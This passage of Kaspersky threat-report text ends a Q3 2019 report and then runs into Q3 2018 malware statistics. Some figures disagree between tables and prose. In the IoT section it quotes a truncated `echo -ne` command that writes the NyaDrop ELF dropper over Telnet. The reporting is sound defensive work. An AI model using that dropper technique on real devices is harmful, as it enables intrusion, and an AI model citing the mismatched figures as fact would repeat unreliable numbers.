The total power saving can be calculated using the formula ·N, where the first factor is the average value of the increase in power consumption of the victim's device during the web mining process, and N is the number of blocked attempts according to KSN ([Kaspersky Security Network](<https://www.kaspersky.com/ksn>)) data for 2018. This figure is equal to 18.8±11.8 gigawatts (GW) – twice the average power consumption rate of all Bitcoin miners in the same year. To assess the amount of saved energy based on this power consumption rate, this number is multiplied by the average time that victim devices spend on web mining; that is, according to the formula '·N·t', where 't' is the average time that web miners would have been working had they not been blocked by our products. Since this value cannot be obtained from Kaspersky data, we used information from open sources provided by third-party researchers, according to which the estimated amount of electricity saved by users of our products ranges from 240 to 1,670 megawatt hours (MWh). Using the average prices for individual consumers, this amount of electricity could cost up to $200,000 for residents in North America or up to €250,000 for residents in Europe.

You can read our report [here](<https://securelist.com/electricity-and-mining/93292/>).

### Mac OS threat landscape

Some people still believe that there are no serious threats for Mac OS. There are certainly fewer threats than for Windows, mainly because more people run Windows, so there is a bigger pool of potential victims for attackers to target. However, as the number of people running Mac OS has grown, so has the number of threats targeting them.

Our database currently contains 206,759 unique malicious and potentially unwanted files for Mac OS.
From 2012 to 2017, the number of people facing attack grew year by year, reaching a peak in 2017, when we blocked attacks on around 255,000 computers running Mac OS. Since then, there has been a drop; and in the first half of 2019, we blocked around 87,000 attacks. The majority of threats for Mac OS in 2019 fell into the adware category – these threats are easier to create, offering a better return on investment for cybercriminals.

The number of phishing attacks targeting Mac OS has also increased year by year. During the first half of 2019, we detected nearly 6 million phishing attacks, 11.8% of which targeted corporate users. The countries facing the most phishing attacks were Brazil (30.87%), India (22.08%) and France (22.02%). The number of phishing attacks seeking to exploit the Apple brand name has also grown in recent years – by around 30-40% each year. In 2018, there were nearly 1.5 million such attacks; and in the first half of 2019 alone, the number exceeded 1.6 million – already an increase of 9% over the previous year.

You can read our report on the current Mac OS threat landscape [here](<https://securelist.com/threats-to-macos-users/93116/>).

### Smart home vulnerabilities

One of our colleagues chose to turn his home into a smart home and installed a Fibaro Home Center system, so that he could remotely manage smart devices in the house, including lights, heating system, fridge, stereo system, sauna heater, smoke detectors, flood sensors, IP cameras and doorbell. He invited researchers from the [Kaspersky ICS CERT](<https://ics-cert.kaspersky.com/>) team to investigate it to see how secure it was. The researchers knew the model of the smart home hub and the IP address. They decided not to look at the Z-Wave protocol, which the smart home hub uses to talk to the appliances, because this required physical proximity to the house.
They also discarded the idea of exploiting the programming language interpreter – the Fibaro hub used the patched version.

Our researchers were able to find a remote SQL injection vulnerability, despite the efforts of Fibaro to avoid them, and a couple of remote code execution vulnerabilities in the PHP code. If exploited, these vulnerabilities would allow attackers to get root access rights on the smart hub, giving them full control over it. They also found a severe vulnerability in the Fibaro cloud that could allow an attacker to access all backups uploaded from Fibaro hubs around the world. This is how our research team acquired the backup data stored by the Fibaro Home Center located in this particular home. Among other things, this backup contains a database file with a lot of personal information, including the house's location, geo-location data from the owner's smartphone, the email address used to register with Fibaro, information about smart devices in the owner's home and even the owner's password. Credit to Fibaro Group not only for creating a rather secure product but also for working closely with our researchers to quickly patch the vulnerabilities we reported to them. You can read the full story [here](<https://securelist.com/fibaro-smart-home/91416/>).

### Security of smart buildings

This quarter we also looked at the [security of automation systems in buildings](<https://securelist.com/smart-buildings-threats/93322/>) – sensors and controllers to manage elevators, ventilation, heating, lighting, electricity, water supply, video surveillance, alarm systems, fire extinguishing systems and more in industrial facilities. Such systems are used not only in office and residential buildings but also in hospitals, shopping malls, prisons, industrial production, public transport and other places where large work and/or living areas need to be controlled.
We looked at the live threats to building-based automation systems to see what malware their owners encountered in the first six months of 2019.

Most of the blocked threats were neither targeted nor specific to building-based automation systems, but ordinary malware regularly found on corporate networks unrelated to automation systems. Such threats can still have a significant impact on the availability and integrity of automation systems, from file encryption (including databases) to denial of service on network equipment and workstations because of malicious traffic and unstable exploits. Spyware and backdoors pose a far greater threat, since stolen authentication data and the remote control it provides can be used to plan and carry out a subsequent targeted attack on a building's automation system.

### Smart cars and connected devices

Kaspersky has investigated smart car security several times in recent years ([here](<https://securelist.com/mobile-apps-and-stealing-a-connected-car/77576/>) and [here](<https://securelist.com/a-study-of-car-sharing-apps/86948/>)), revealing a number of security issues. As vehicles become smarter and more connected, they are also becoming more exposed. However, this doesn't just apply to smart cars and the apps that support them. There is now a whole industry of after-market devices designed to improve the driving experience – from car scanners to tuning gadgets. In a recent report, [we reviewed a number of automotive connected devices](<https://securelist.com/on-the-iot-road/91833/>) and their security setup. This exercise provided us with a first look at security issues in these devices. Our review included a couple of auto scanners, a dashboard camera, a GPS tracker, a smart alarm system and a pressure and temperature monitoring system.

We found the security of these devices more or less adequate, leaving aside minor issues.
This is partly due to the limited device functionality and a lack of serious consequences in the event of a successful attack. It's also due to the vigilance of vendors. However, as we move towards a more and more connected future, it's important to remember that the smarter an object is, the more attention should be paid to security in the development and updating of a device: careless development or an unpatched vulnerability could allow an attacker to hijack a victim's car or spy on an entire car fleet.

We continue to develop [KasperskyOS](<https://os.kaspersky.com/2019/05/20/kasperskyos-an-immune-based-approach-to-information-system-security/>), to help customers secure connected systems – including mobile devices and PCs, internet of things devices, intelligent energy systems, industrial systems, telecommunications systems and transportation systems.

If you're considering buying a device to make your car a little bit smarter, you should think about the security risks. Check to see if any vulnerabilities affect the device and whether it's possible to apply security updates to it. Don't automatically buy the most recently released product, since it might contain a security flaw that hasn't yet been discovered: the best choice is to buy a product that has already been updated several times. Finally, always consider the security of the 'mobile dimension' of the device, especially if you use an Android device: while applications make life easier, once a smartphone is hit by malware a lot can go wrong.

### Personal data theft

We've become used to a steady stream of reports in the news about data breaches. Recent examples include the [theft of 23,205,290 email addresses](<https://www.forbes.com/sites/daveywinder/2019/08/05/cafepress-hacked-23m-accounts-compromised-is-yours-one-of-them/#625d70cf407e>) together with passwords weakly stored as base64 SHA-1 encoded hashes from CafePress.
Worryingly, the hack was reported by [Have I Been Pwned](<https://haveibeenpwned.com>) – CafePress didn't notify its customers until some months after the breach had occurred.

In August, two Israeli [researchers discovered fingerprints, facial recognition data and other personal information from the Suprema Biostar 2 biometric access control system in a publicly accessible database](<https://www.theguardian.com/technology/2019/aug/14/major-breach-found-in-biometrics-system-used-by-banks-uk-police-and-defence-firms>). The exposure of biometric data is of particular concern. If a hacker is able to obtain my password, I can change it, but a biometric is for life.

[Facebook has faced criticism on several occasions for failing to handle customers' data properly](<https://www.kaspersky.com/blog/facebook-10-fails/26980/>). In the latest of a long list of incidents, hundreds of millions of [phone numbers linked to Facebook accounts were found online](<https://techcrunch.com/2019/09/04/facebook-phone-numbers-exposed/?guccounter=1>) on a server that wasn't protected with a password. Each record contained a unique Facebook ID and the phone number listed on the account, leaving affected Facebook customers open to spam calls and SIM-swap attacks.

On September 12, mobile gaming company [Zynga reported that some player account data may have been accessed illegally by 'outside hackers'](<https://www.scmagazine.com/home/security-news/the-word-is-out-zynga-was-breached/>). Subsequently, a hacker going by the name of Gnosticplayers claimed to have breached the player database of _Words With Friends_, as well as data from _Draw Something_ and the discontinued game _OMGPOP_, exposing the data of more than 200 million Android and iOS players. While Zynga spotted the breach and notified customers, it's worrying that passwords were stored in cleartext.

Consumers have no direct control over the security of the personal data they disclose to online providers.
However, we can limit the damage of a security breach at an online provider by ensuring that the passwords we create are unique and hard to guess, or by using a password manager to do this for us. By making use of two-factor authentication, where offered by an online provider, we can further reduce the impact of any breach.

It's also worth bearing in mind that hacking the server of an online provider isn't the only way that cybercriminals can get their hands on passwords and other personal data. They also harvest data stored on a consumer's computer directly. This includes data stored in browsers, files from the hard disk, system data, account logins and more. Our data shows that 940,000 people were targeted by malware designed to steal such data in the first half of 2019. We would recommend using specialist software to store account passwords and bank card details, rather than relying on your browser. You can find out more about how cybercriminals target personal data on computers [here](<https://securelist.com/how-to-steal-a-million-of-your-data/91855/>).

_Source: "IT threat evolution Q3 2019", Securelist, published 2019-11-29, https://securelist.com/it-threat-evolution-q3-2019/95268/; CVEs referenced: CVE-2017-11882, CVE-2018-0802, CVE-2019-2725, CVE-2019-2729._

---

_These statistics are based on detection verdicts of Kaspersky Lab products received from users who consented to provide statistical data. 
_

## Q3 figures

According to Kaspersky Security Network:

 * Kaspersky Lab solutions blocked 947,027,517 attacks launched from online resources located in 203 countries.
 * 246,695,333 unique URLs were recognized as malicious by Web Anti-Virus components.
 * Attempted infections by malware designed to steal money via online access to bank accounts were logged on the computers of 305,315 users.
 * Ransomware attacks were registered on the computers of 259,867 unique users.
 * Our File Anti-Virus logged 239,177,356 unique malicious and potentially unwanted objects.
 * Kaspersky Lab products for mobile devices detected:
   * 1,305,015 malicious installation packages
   * 55,101 installation packages for mobile banking Trojans
   * 13,075 installation packages for mobile ransomware Trojans.

## Mobile threats

### Q3 events

Perhaps the biggest news of the reporting period was the [Trojan-Banker.AndroidOS.Asacub](<https://securelist.com/the-rise-of-mobile-banker-asacub/87591/>) epidemic. It peaked in September when more than 250,000 unique users were attacked – and that only includes statistics for those with Kaspersky Lab's mobile products installed on their devices.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09145748/it-threat-evolution-q3-2018-statistics_01.png>)

_Number of users attacked by the mobile banker Asacub in 2017 and 2018_

The scale of the attack involving Asacub by far surpasses the largest attacks we have previously observed while monitoring mobile threats. The Trojan's versions have sequential version numbers, suggesting the attacks were launched by just one threat actor. It's impossible to count the total number of affected users, but it would need to be in the tens of thousands to make such a massive malicious campaign profitable.

### Mobile threat statistics

In Q3 2018, Kaspersky Lab detected **1,305,015** malicious installation packages, which is 439,229 fewer packages than in the previous quarter.

_Number of detected malicious installation packages, Q3 2017 – Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09150155/it-threat-evolution-q3-2018-statistics_02.png>)

#### Distribution of detected mobile apps by type

Among all the threats detected in Q3 2018, the lion's share belonged to potentially unwanted RiskTool apps (52.05%); compared to the previous quarter, their share decreased by 3.3 percentage points (p.p.). Members of the RiskTool.AndroidOS.SMSreg family contributed most to this.

_Distribution of newly detected mobile apps by type, Q2 – Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/12081111/it-threat-evolution-q3-2018-statistics_03.png>)

Second place was occupied by Trojan-Dropper threats (22.57%), whose share increased by 9 p.p.
Most files of this type belonged to the Trojan-Dropper.AndroidOS.Piom, Trojan-Dropper.AndroidOS.Wapnor and Trojan-Dropper.AndroidOS.Hqwar families.

The share of advertising apps continued to decrease and accounted for 6.44% of all detected threats (compared to 8.91% in Q2 2018).

The statistics show that the number of mobile financial threats has been rising throughout 2018, with the proportion of mobile banker Trojans increasing from 1.5% in Q1 to 4.38% of all detected threats in Q3.

**TOP 20 mobile malware**

| | Verdicts* | %** |
|---|---|---|
| 1 | DangerousObject.Multi.Generic | 55.85 |
| 2 | Trojan.AndroidOS.Boogr.gsh | 11.39 |
| 3 | Trojan-Banker.AndroidOS.Asacub.a | 5.28 |
| 4 | Trojan-Banker.AndroidOS.Asacub.snt | 5.10 |
| 5 | Trojan.AndroidOS.Piom.toe | 3.23 |
| 6 | Trojan.AndroidOS.Dvmap.a | 3.12 |
| 7 | Trojan.AndroidOS.Triada.dl | 3.09 |
| 8 | Trojan-Dropper.AndroidOS.Tiny.d | 2.88 |
| 9 | Trojan-Dropper.AndroidOS.Lezok.p | 2.78 |
| 10 | Trojan.AndroidOS.Agent.rt | 2.74 |
| 11 | Trojan-Banker.AndroidOS.Asacub.ci | 2.62 |
| 12 | Trojan-Banker.AndroidOS.Asacub.cg | 2.51 |
| 13 | Trojan-Banker.AndroidOS.Asacub.ce | 2.29 |
| 14 | Trojan-Dropper.AndroidOS.Agent.ii | 1.77 |
| 15 | Trojan-Dropper.AndroidOS.Hqwar.bb | 1.75 |
| 16 | Trojan.AndroidOS.Agent.pac | 1.61 |
| 17 | Trojan-Dropper.AndroidOS.Hqwar.ba | 1.59 |
| 18 | Exploit.AndroidOS.Lotoor.be | 1.55 |
| 19 | Trojan.AndroidOS.Piom.uwp | 1.48 |
| 20 | Trojan.AndroidOS.Piom.udo | 1.36 |

_* This malware rating does not include potentially dangerous or unwanted programs such as RiskTool or adware._
_** Unique users attacked by the given malware as a percentage of all users of Kaspersky Lab's mobile antivirus that were attacked._

First place in our TOP 20 once again went to DangerousObject.Multi.Generic (55.85%), the verdict we use for malware that's detected [using cloud technologies](<https://www.kaspersky.com/enterprise-security/wiki-section/products/big-data-the-astraea-technology>).
Cloud technologies work when antivirus databases do not yet contain the data to detect a malicious program but the company's cloud antivirus database already includes information about the object. This is basically how the very latest malicious programs are detected.

In second place was Trojan.AndroidOS.Boogr.gsh (11.39%). This verdict is given to files that our system recognizes as malicious based on [machine learning](<https://www.kaspersky.com/enterprise-security/wiki-section/products/machine-learning-in-cybersecurity>).

Third and fourth places went to representatives of the Asacub mobile banker family – Trojan-Banker.AndroidOS.Asacub.a (5.28%) and Trojan-Banker.AndroidOS.Asacub.snt (5.10%).

#### Geography of mobile threats

_Map of attempted infections using mobile malware, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151353/it-threat-evolution-q3-2018-statistics_04_en.png>)

**TOP 10 countries by share of users attacked by mobile malware:**

| | Country* | %** |
|---|---|---|
| 1 | Bangladesh | 35.91 |
| 2 | Nigeria | 28.54 |
| 3 | Iran | 28.07 |
| 4 | Tanzania | 28.03 |
| 5 | China | 25.61 |
| 6 | India | 25.25 |
| 7 | Pakistan | 25.08 |
| 8 | Indonesia | 25.02 |
| 9 | Philippines | 23.07 |
| 10 | Algeria | 22.88 |

_* Countries with relatively few users of Kaspersky Lab's mobile antivirus (under 10,000) are excluded._
_** Unique users attacked in the country as a percentage of all users of Kaspersky Lab's mobile antivirus in the country._

In Q3 2018, Bangladesh (35.91%) retained first place in terms of the share of mobile users attacked. Nigeria (28.54%) came second. Third and fourth places were claimed by Iran (28.07%) and Tanzania (28.03%) respectively.

### Mobile banking Trojans

During the reporting period, we detected **55,101** installation packages for mobile banking Trojans, which is nearly 6,000 fewer than in Q2 2018.

The largest contribution was made by Trojans belonging to the family Trojan-Banker.AndroidOS.Hqwar.jck – this verdict was given to 35% of all detected banking Trojans. Trojan-Banker.AndroidOS.Asacub came second, accounting for 29%.

_Number of installation packages for mobile banking Trojans detected by Kaspersky Lab, Q3 2017 – Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09150645/it-threat-evolution-q3-2018-statistics_05.png>)

| | Verdicts | %* |
|---|---|---|
| 1 | Trojan-Banker.AndroidOS.Asacub.a | 33.27 |
| 2 | Trojan-Banker.AndroidOS.Asacub.snt | 32.16 |
| 3 | Trojan-Banker.AndroidOS.Asacub.ci | 16.51 |
| 4 | Trojan-Banker.AndroidOS.Asacub.cg | 15.84 |
| 5 | Trojan-Banker.AndroidOS.Asacub.ce | 14.46 |
| 6 | Trojan-Banker.AndroidOS.Asacub.cd | 6.66 |
| 7 | Trojan-Banker.AndroidOS.Svpeng.q | 3.25 |
| 8 | Trojan-Banker.AndroidOS.Asacub.cf | 2.07 |
| 9 | Trojan-Banker.AndroidOS.Asacub.bz | 1.68 |
| 10 | Trojan-Banker.AndroidOS.Asacub.bw | 1.68 |

_* Unique users attacked by the given malware as a percentage of all users of Kaspersky Lab's mobile antivirus that were attacked by banking threats._

In Q3 2018, the TOP 10 rating of banking threats was almost exclusively (nine places out of 10) occupied by various versions of Trojan-Banker.AndroidOS.Asacub.

_Geography of mobile banking threats, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151425/it-threat-evolution-q3-2018-statistics_06_en.png>)

**TOP 10 countries by share of users attacked by mobile banking Trojans:**

| | Country* | %** |
|---|---|---|
| 1 | Russia | 2.18 |
| 2 | South Africa | 2.16 |
| 3 | Malaysia | 0.53 |
| 4 | Ukraine | 0.41 |
| 5 | Australia | 0.39 |
| 6 | China | 0.35 |
| 7 | South Korea | 0.33 |
| 8 | Tajikistan | 0.30 |
| 9 | USA | 0.27 |
| 10 | Poland | 0.25 |

_* Countries where the number of users of Kaspersky Lab's mobile antivirus is relatively small (under 10,000) are excluded._
_** 
Unique users in the country attacked by mobile ransomware Trojans as a percentage of all users of Kaspersky Lab's mobile antivirus in the country._

In Q3 2018, Russia ended up in first place in this TOP 10 because of the mass attacks involving the Asacub Trojan. The USA, the previous quarter's leader, fell to ninth (0.27%) in Q3. Second and third place were occupied by South Africa (2.16%) and Malaysia (0.53%) respectively.

### Mobile ransomware Trojans

In Q3 2018, we detected **13,075** installation packages for mobile ransomware Trojans, which is 1,044 fewer than in Q2.

_Number of installation packages for mobile ransomware Trojans detected by Kaspersky Lab, Q3 2017 – Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09150710/it-threat-evolution-q3-2018-statistics_07.png>)

| | Verdicts | %* |
|---|---|---|
| 1 | Trojan-Ransom.AndroidOS.Svpeng.ag | 47.79 |
| 2 | Trojan-Ransom.AndroidOS.Svpeng.ah | 26.55 |
| 3 | Trojan-Ransom.AndroidOS.Zebt.a | 6.71 |
| 4 | Trojan-Ransom.AndroidOS.Fusob.h | 6.23 |
| 5 | Trojan-Ransom.AndroidOS.Rkor.g | 5.50 |
| 6 | Trojan-Ransom.AndroidOS.Svpeng.snt | 3.38 |
| 7 | Trojan-Ransom.AndroidOS.Svpeng.ab | 2.15 |
| 8 | Trojan-Ransom.AndroidOS.Egat.d | 1.94 |
| 9 | Trojan-Ransom.AndroidOS.Small.as | 1.43 |
| 10 | Trojan-Ransom.AndroidOS.Small.cj | 1.23 |

_* Unique users attacked by the given malware as a percentage of all users of Kaspersky Lab's mobile antivirus attacked by ransomware Trojans._

In Q3 2018, the most widespread mobile ransomware Trojans belonged to the Svpeng family – Trojan-Ransom.AndroidOS.Svpeng.ag (47.79%) and Trojan-Ransom.AndroidOS.Svpeng.ah (26.55%). Together, they accounted for three quarters of all mobile ransomware Trojan attacks.
The once-popular families Zebt and Fusob were a distant third and fourth, represented by Trojan-Ransom.AndroidOS.Zebt.a (6.71%) and Trojan-Ransom.AndroidOS.Fusob.h (6.23%) respectively.

_Geography of mobile ransomware Trojans, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151458/it-threat-evolution-q3-2018-statistics_08_en.png>)

**TOP 10 countries by share of users attacked by mobile ransomware Trojans:**

| | Country* | %** |
|---|---|---|
| 1 | USA | 1.73 |
| 2 | Kazakhstan | 0.36 |
| 3 | China | 0.14 |
| 4 | Italy | 0.12 |
| 5 | Iran | 0.11 |
| 6 | Belgium | 0.10 |
| 7 | Switzerland | 0.09 |
| 8 | Poland | 0.09 |
| 9 | Mexico | 0.09 |
| 10 | Romania | 0.08 |

_* Countries where the number of users of Kaspersky Lab's mobile antivirus is relatively small (under 10,000) are excluded._
_** Unique users in the country attacked by mobile ransomware Trojans as a percentage of all users of Kaspersky Lab's mobile antivirus in the country._

Just like in Q2, first place in the TOP 10 went to the United States (1.73%). Kazakhstan (0.6%) rose one place to second in Q3, while China (0.14%) rose from seventh to third.

## Attacks on IoT devices

In this quarter's report, we decided to only present the statistics for Telnet attacks, as this type of attack is used most frequently and employs the widest variety of malware types.

| Service | Share |
|---|---|
| Telnet | 99.4% |
| SSH | 0.6% |

_The popularity of attacked services according to the number of unique IP addresses from which attacks were launched, Q3 2018_

### Telnet attacks

_Geography of IP addresses of devices from which attacks were attempted on Kaspersky Lab honeypots, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151529/it-threat-evolution-q3-2018-statistics_09_en.png>)

**TOP 10 countries hosting devices that were sources of attacks targeting Kaspersky Lab honeypots.**

| | Country | %* |
|---|---|---|
| 1 | China | 27.15% |
| 2 | Brazil | 10.57% |
| 3 | Russia | 7.87% |
| 4 | Egypt | 7.43% |
| 5 | USA | 4.47% |
| 6 | South Korea | 3.57% |
| 7 | India | 2.59% |
| 8 | Taiwan | 2.17% |
| 9 | Turkey | 1.82% |
| 10 | Italy | 1.75% |

_* Infected devices in each country as a percentage of the global number of IoT devices that attack via Telnet._

In Q3, China (23.15%) became the leader in terms of the number of unique IP addresses directing attacks against Kaspersky Lab honeypots. Brazil (10.57%) came second, after leading the rating in Q2. Russia (7.87%) was third.

Successful Telnet attacks saw the threat actors download Downloader.Linux.NyaDrop.b (62.24%) most often. This piece of malware is remarkable in that it contains a shell code that downloads other malware from the same source computer that has just infected the victim IoT device. The shell code doesn't require any utilities – it performs all the necessary actions within itself using system calls. In other words, NyaDrop is a kind of universal soldier, capable of performing its tasks irrespective of the environment it has been launched in.

It was the Trojans of the family Backdoor.Linux.Hajime that downloaded NyaDrop most frequently, because this is a very convenient self-propagation method for Hajime. The flow chart in this case is of particular interest:

 1. 
After successfully infecting a device, Hajime scans the network to find new victims.
 2. As soon as a suitable device is found, the lightweight NyaDrop (just 480 bytes) is downloaded to it.
 3. NyaDrop contacts the device that was the infection source and slowly downloads Hajime, which is much larger.

All these actions are only required because it's quite a challenge to download files via Telnet, though it is possible to execute commands. For example, this is what creating a NyaDrop file looks like:

    echo -ne "\x7f\x45\x4c\x46\x01\x01\x01\x00\x00

480 bytes can be sent this way, but sending 60 KB becomes problematic.

**TOP 10 malware downloaded to infected IoT devices in successful Telnet attacks**

| | Verdicts | %* |
|---|---|---|
| 1 | Trojan-Downloader.Linux.NyaDrop.b | 62.24% |
| 2 | Backdoor.Linux.Mirai.ba | 16.31% |
| 3 | Backdoor.Linux.Mirai.b | 12.01% |
| 4 | Trojan-Downloader.Shell.Agent.p | 1.53% |
| 5 | Backdoor.Linux.Mirai.c | 1.33% |
| 6 | Backdoor.Linux.Gafgyt.ay | 1.15% |
| 7 | Backdoor.Linux.Mirai.au | 0.83% |
| 8 | Backdoor.Linux.Gafgyt.bj | 0.61% |
| 9 | Trojan-Downloader.Linux.Mirai.d | 0.51% |
| 10 | Backdoor.Linux.Mirai.bj | 0.37% |

_* Proportion of downloads of each specific malicious program to IoT devices in successful Telnet attacks as a percentage of all malware downloads in such attacks._

The rating did not differ much from the previous quarter: half the top 10 is occupied by different modifications of Mirai, which is the most widespread IoT malware program to date.

## Financial threats

### Q3 events

The banking Trojan DanaBot that was detected in Q2 continued to develop rapidly in Q3. A new modification included not only an updated C&C/bot communication protocol but also an extended list of organizations targeted by the malware.
Its prime targets in Q2 were located in Australia and Poland, but in Q3 organizations from Austria, Germany and Italy were also included.

To recap, DanaBot has a modular structure and is capable of loading extra modules to intercept traffic and steal passwords and crypto wallets. The Trojan spread via spam messages containing a malicious Office document, which subsequently loaded the Trojan's main body.

### Financial threat statistics

In Q3 2018, Kaspersky Lab solutions blocked attempts to launch one or more malicious programs designed to steal money from bank accounts on the computers of 305,315 users.

_Number of unique users attacked by financial malware, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151555/it-threat-evolution-q3-2018-statistics_10_en.png>)

#### Geography of attacks

To evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, we calculated the share of users of Kaspersky Lab products in each country that faced this threat during the reporting period out of all users of our products in that country.

_Geography of banking malware attacks, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151629/it-threat-evolution-q3-2018-statistics_11_en.png>)

**TOP 10 countries by percentage of attacked users**

| | Country* | %** |
|---|---|---|
| 1 | Germany | 3.0 |
| 2 | South Korea | 2.8 |
| 3 | Greece | 2.3 |
| 4 | Malaysia | 2.1 |
| 5 | Serbia | 2.0 |
| 6 | United Arab Emirates | 1.9 |
| 7 | Portugal | 1.9 |
| 8 | Lithuania | 1.9 |
| 9 | Indonesia | 1.8 |
| 10 | Cambodia | 1.8 |

_* Countries with relatively few users of Kaspersky Lab's mobile antivirus (under 10,000) are excluded._  
_** Unique users attacked by mobile banking Trojans in the country as a percentage of all users of Kaspersky Lab's mobile antivirus in that country._

**TOP 10 banking malware families**

| | Name | Verdicts | %* |
|---|---|---|---|
| 1 | Zbot | Trojan.Win32.Zbot | 25.8 |
| 2 | Nymaim | Trojan.Win32.Nymaim | 18.4 |
| 3 | SpyEye | Backdoor.Win32.SpyEye | 18.1 |
| 4 | RTM | Trojan-Banker.Win32.RTM | 9.2 |
| 5 | Emotet | Backdoor.Win32.Emotet | 5.9 |
| 6 | Neurevt | Trojan.Win32.Neurevt | 4.7 |
| 7 | Tinba | Trojan-Banker.Win32.Tinba | 2.8 |
| 8 | NeutrinoPOS | Trojan-Banker.Win32.NeutrinoPOS | 2.4 |
| 9 | Gozi | Trojan.Win32.Gozi | 1.6 |
| 10 | Trickster | Trojan.Win32.Trickster | 1.4 |

_* Unique users attacked by the given malware as a percentage of all users that were attacked by banking threats._

In Q3 2018, there were three newcomers to this TOP 10: Trojan.Win32.Trickster (1.4%), Trojan-Banker.Win32.Tinba (2.8%) and Trojan-Banker.Win32.RTM (9.2%). The latter shot to fourth place thanks to a mass mailing campaign in mid-July that involved emails with malicious attachments and links.

Overall, the TOP 3 remained the same, though Trojan.Win32.Nymaim ceded some ground – from 27% in Q2 to 18.4% in Q3 – and fell to second.

## Cryptoware programs

### Q3 events

In early July, Kaspersky Lab experts detected an unusual modification of the notorious Rakhni Trojan. What drew the analysts' attention was that in some cases the downloader now delivers a [miner](<https://securelist.com/to-crypt-or-to-mine-that-is-the-question/86307/>) instead of ransomware, as had always been the case with this malware family in the past.

August saw the detection of the rather unusual [KeyPass](<https://securelist.com/keypass-ransomware/87412/>) ransomware. Its creators apparently decided to make provisions for all possible infection scenarios – via spam, with the help of exploit packs, and via manual brute-force attacks on the passwords of the remote access system, after which the Trojan is launched. The KeyPass Trojan can run in both hidden mode and GUI mode, so the threat actor can configure encryption parameters.

Meanwhile, law enforcement agencies continue their systematic battle against ransomware. Following several years of investigations, two cybercriminals who distributed the [CoinVault](<https://securelist.com/coinvault-are-we-reaching-the-end-of-the-nightmare/72187/>) ransomware [were found guilty](<https://securelist.com/coinvault-the-court-case/86503/>) in the Netherlands.

### Statistics

#### Number of new modifications

In Q3, the number of detected cryptoware modifications was significantly lower than in Q2 and close to that of Q1.

_Number of new cryptoware modifications, Q4 2017 – Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151203/it-threat-evolution-q3-2018-statistics_12.png>)

#### Number of users attacked by Trojan cryptors

In Q3 2018, Kaspersky Lab products protected 259,867 unique KSN users from Trojan cryptors. The total number of attacked users rose both against Q2 and on a month-on-month basis during Q3. In September, we observed a significant rise in the number of attempted infections, which appears to correlate with people returning from seasonal vacations.

_Number of unique users attacked by Trojan cryptors, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151654/it-threat-evolution-q3-2018-statistics_13_en.png>)

#### Geography of attacks

_Geography of Trojan cryptors attacks, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151726/it-threat-evolution-q3-2018-statistics_14_en.png>)

**TOP 10 countries attacked by Trojan cryptors**

| | Country* | %** |
|---|---|---|
| 1 | Bangladesh | 5.80 |
| 2 | Uzbekistan | 3.77 |
| 3 | Nepal | 2.18 |
| 4 | Pakistan | 1.41 |
| 5 | India | 1.27 |
| 6 | Indonesia | 1.21 |
| 7 | Vietnam | 1.20 |
| 8 | Mozambique | 1.06 |
| 9 | China | 1.05 |
| 10 | Kazakhstan | 0.84 |

_* Countries with relatively few Kaspersky Lab users (under 50,000) are excluded._  
_** Unique users whose computers were attacked by Trojan cryptors as a percentage of all unique users of Kaspersky Lab products in that country._

Most of the places in this rating are occupied by Asian countries. Bangladesh tops the list with 5.8%, followed by Uzbekistan (3.77%) and the newcomer Nepal (2.18%) in third. Pakistan (1.41%) came fourth, while China (1.05%) fell from sixth to ninth and Vietnam (1.20%) fell four places to seventh.

**TOP 10 most widespread cryptor families**

| | Name | Verdicts | %* |
|---|---|---|---|
| 1 | WannaCry | Trojan-Ransom.Win32.Wanna | 28.72% |
| 2 | (generic verdict) | Trojan-Ransom.Win32.Phny | 13.70% |
| 3 | GandCrab | Trojan-Ransom.Win32.GandCrypt | 12.31% |
| 4 | Cryakl | Trojan-Ransom.Win32.Cryakl | 9.30% |
| 5 | (generic verdict) | Trojan-Ransom.Win32.Gen | 2.99% |
| 6 | (generic verdict) | Trojan-Ransom.Win32.Cryptor | 2.58% |
| 7 | PolyRansom/VirLock | Virus.Win32.PolyRansom | 2.33% |
| 8 | Shade | Trojan-Ransom.Win32.Shade | 1.99% |
| 9 | Crysis | Trojan-Ransom.Win32.Crusis | 1.70% |
| 10 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 1.70% |

_* Unique Kaspersky Lab users attacked by a specific family of Trojan cryptors as a percentage of all users attacked by Trojan cryptors._

The leading 10 places are increasingly occupied by generic verdicts, suggesting widespread cryptors are effectively detected by automatic intelligent systems. WannaCry (28.72%) still leads the way among specific cryptoware families. This quarter saw two new versions of the Trojan GandCrab (12.31%) emerge, meaning it remained in the most widespread ransomware rating. Among the old-timers that remained in the TOP 10 were PolyRansom, Cryakl, Shade, and Crysis, while Cerber and Purgen failed to gain much distribution this quarter.

## Cryptominers

_As we already reported in [Ransomware and malicious cryptominers in 2016-2018](<https://securelist.com/ransomware-and-malicious-crypto-miners-in-2016-2018/86238/>), ransomware is gradually declining and being replaced with cryptocurrency miners. Therefore, this year we decided to start publishing quarterly reports on the status of this type of threat. At the same time, we began using a broader range of verdicts as a basis for collecting statistics on miners, so the statistics in this year's quarterly reports may not be consistent with the data from our earlier publications._

### Statistics

#### Number of new modifications

In Q3 2018, Kaspersky Lab solutions detected 31,991 new modifications of miners.

